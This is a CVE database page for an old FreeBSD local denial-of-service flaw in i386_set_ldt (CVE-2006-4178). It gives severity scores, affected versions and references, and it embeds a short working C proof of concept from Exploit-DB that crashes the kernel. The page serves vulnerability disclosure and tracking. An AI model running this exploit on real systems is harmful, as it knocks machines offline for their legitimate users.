CVE-2006-4178 : Detail

CVE-2006-4178

0.04%V3
Local
2006-09-25
23h43 +00:00
2018-10-17
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Integer signedness error in the i386_set_ldt call in FreeBSD 5.5, and possibly earlier versions down to 5.2, allows local users to cause a denial of service (crash) via unspecified arguments that use negative signed integers to cause the bzero function to be called with a large length parameter, a different vulnerability than CVE-2006-4172.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 28648

Publication date : 2006-09-22 22h00 +00:00
Author : Adriano Lima
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/20158/info FreeBSD is prone to multiple local denial-of-service vulnerabilities. These issues occur because of input-validation flaws related to the handling of integers. An attacker may leverage these issues to cause the affected computer to crash, denying service to legitimate users. Versions 5.2 through 5.5 are vulnerable to these issues; other versions may also be affected. #include <stdio.h> #include <stdlib.h> #include <machine/segments.h> #include <machine/sysarch.h> int main(int argc,char **argv){ if(i386_set_ldt(LUDATA_SEL+1,NULL,-1)==-1){ perror("i386_set_ldt"); exit(EXIT_FAILURE); } exit(EXIT_FAILURE); }

Products Mentioned

Configuraton 0

Freebsd>>Freebsd >> Version To (including) 5.5

Freebsd>>Freebsd >> Version 5.2

Freebsd>>Freebsd >> Version 5.2.1

Freebsd>>Freebsd >> Version 5.3

Freebsd>>Freebsd >> Version 5.4

References

http://securitytracker.com/id?1016927
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/22064
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/20158
Tags : vdb-entry, x_refsource_BID
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=415
Tags : third-party-advisory, x_refsource_IDEFENSE